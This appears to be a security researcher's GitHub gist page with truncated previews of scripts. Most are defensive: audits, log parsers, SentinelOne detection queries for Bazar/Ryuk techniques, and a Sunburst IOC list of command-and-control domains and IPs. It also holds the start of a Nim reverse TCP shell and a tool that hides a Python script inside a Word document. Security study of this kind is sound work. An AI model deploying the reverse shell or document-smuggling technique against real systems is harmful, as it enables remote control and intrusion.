@keyboardcrunch
keyboardcrunch / FFCertOverrideAudit.ps1
Created December 7, 2018 15:37
enumerate data from certificates overridden in firefox
$SkipFolders = ("Public", "Default")
$UserFolders = Get-ChildItem -Path "C:\Users\" -Exclude $SkipFolders
$CertData = @()
ForEach ($User in $UserFolders) {
    $override = Get-ChildItem -Path "$($User)\AppData\Roaming\Mozilla\Firefox\Profiles" -Recurse -Filter cert_override.txt -Force -ErrorAction SilentlyContinue
    Foreach ($ofile in $override) {
        $Certs = Get-Content $ofile.FullName | Select-Object -skip 2
        Foreach ($line in $Certs) {
            # https://developer.mozilla.org/en-US/docs/Archive/Misc_top_level/Cert_override.txt
            $data = $line -split '\s+' # split line by whitespace
@keyboardcrunch
keyboardcrunch / ChromeExtensionDownload.py
Created March 10, 2019 02:54
repurposed chrome extension download and extraction script
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
Python Script to download the Chrome Extensions (CRX) file directly from the google chrome web store.
Referred from http://chrome-extension-downloader.com/how-does-it-work.php
"""
import argparse
@keyboardcrunch
keyboardcrunch / EventParser.ps1
Created October 4, 2019 21:45 — forked from medmondson44/EventParser.ps1
This PowerShell script is used to parse Windows events.
Function Get-PowerShellLog {
<#
.SYNOPSIS
Get-PowerShellLog extracts all PowerShell ScriptBlock Events [Evt 4104] from the Microsoft-Windows-PowerShell/Operational Event log for a specified timeframe
.DESCRIPTION
Query the event log and pull back all PowerShell ScriptBlock Events.
Event 4104
Query and filter
.PARAMETER
Switch to pull back PowerShell ScriptBlock Log back a desired number of minutes
@keyboardcrunch
keyboardcrunch / revshell.nim
Created December 12, 2019 01:19
Reverse TCP shell in Nim-Lang; with rejoin/retry connections
import net, os, osproc

while true:
  try:
    var client: Socket = newSocket()
    client.connect("127.0.0.1", Port(5858))
    stdout.writeLine("Connected to server.")
    while true:
      let message: string = client.recvLine()
@keyboardcrunch
keyboardcrunch / unhide.py
Created April 3, 2020 02:25
Excel workbook unhider.
#!/usr/bin/python3
"""
./oledump.py -p plugin_biff --pluginoptions "-o bound -a" sample.xls
1: 4096 '\x05DocumentSummaryInformation'
2: 236 '\x05SummaryInformation'
3: 104629 'Workbook'
Plugin: BIFF plugin
0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible
' 00000000: CA D9 00 00 00 00 06 00 \xca\xd9......'
@keyboardcrunch
keyboardcrunch / pydocexec.py
Created April 30, 2020 02:24
Injects a python script inside a word document so the doc can be executed with python :)
#!/usr/bin/python3
import sys
import os
import zipfile
import tempfile
from xml.etree import ElementTree
from shutil import copyfile
def stuffer(py_file, doc_file):
@keyboardcrunch
keyboardcrunch / config.yml
Created August 30, 2020 21:42
wtfutil configuration
wtf:
  colors:
    background: "black"
    text: "white"
    title: "red"
    border:
      focusable: grey
      focused: grey
      normal: grey
  grid:
@keyboardcrunch
keyboardcrunch / dashboard.json
Created August 30, 2020 21:48
Customized SentinelOne Dashboard
[{"coordinates":{"cols":5,"rows":4,"x":0,"y":7},"data":{"api":"incidentStatuses","category":"Threats","chartType":"horizontalBar","filter":null,"filterColor":"#272727","refreshInterval":120,"scope":null,"textSettings":null,"timeRange":{"from":null,"timeString":"Last 30 Days","to":null,"type":"set"},"title":"Incident Status"},"id":"22"},{"coordinates":{"cols":5,"rows":4,"x":11,"y":3},"data":{"api":"classifications","category":"Threats","chartType":"doughnut","filter":null,"filterColor":"#272727","refreshInterval":120,"scope":{},"textSettings":null,"timeRange":{"from":null,"timeString":"Last 30 Days","to":null,"type":"set"},"title":"Threats by Type"},"id":"23"},{"coordinates":{"cols":6,"rows":4,"x":10,"y":7},"data":{"api":"threatSummary","category":"Threats","chartType":"line","refreshInterval":120,"scope":null,"textSettings":null,"timeRange":null,"title":"Threat Aging - Last 7 Days"},"id":"24"},{"coordinates":{"cols":5,"rows":4,"x":5,"y":12},"data":{"api":"machineTypes","category":"Endpoints","chartType":"bar"

A few days back Red Canary dropped a blog post titled A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak that highlighted 10 detection opportunities for stopping the most recent Bazar/Ryuk ransomware infections. Below are the 10 SentinelOne Deep Visibility queries I've come up with for detecting the techniques.

1. Process hollowing of cmd.exe

T1055.012 Hollowing of cmd.exe

SrcProcParentName = "cmd.exe" AND SrcProcName In Anycase ("svchost.exe","explorer.exe","nltest.exe","net.exe") AND DstPort In ("443","53")

2. Enumerating domain trusts activity with nltest.exe

T1482 Domain Trust Discovery

@keyboardcrunch
keyboardcrunch / fireeye_sunburn_iocs.txt
Last active December 14, 2020 05:23
SentinelOne DV Query for FireEye's Sunburst IOCs
DstIp In ("13.59.205.66","54.193.127.66","54.215.192.52","34.203.203.23","139.99.115.204","5.252.177.25","5.252.177.21","204.188.205.176","51.89.125.18","167.114.213.199") OR DnsRequest In Contains ("avsvmcloud.com","freescanonline.com","deftsecurity.com","freescanonline.com","thedoccloud.com","websitetheme.com","highdatabase.com","incomeupdate.com","databasegalore.com","panhardware.com","zupertech.com") OR Sha256 In ("d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600","53f8dfc65169ccda021b72a62e0c22a4db7c4077f002fa742717d41b3c40f2c7","019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134","ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6","32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77","292327e5c94afa352cc5a02ca273df543f2020d0e76368ff96c84f4e90778712","c15abaf51e78ca56c0376522d699c978217bf041a3bd3c71d09193efa5717c71","dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b","eb6fab5a2964c5817fb239a7a5079cabca0a00464fb3e07155f28b0a57a2c0ed"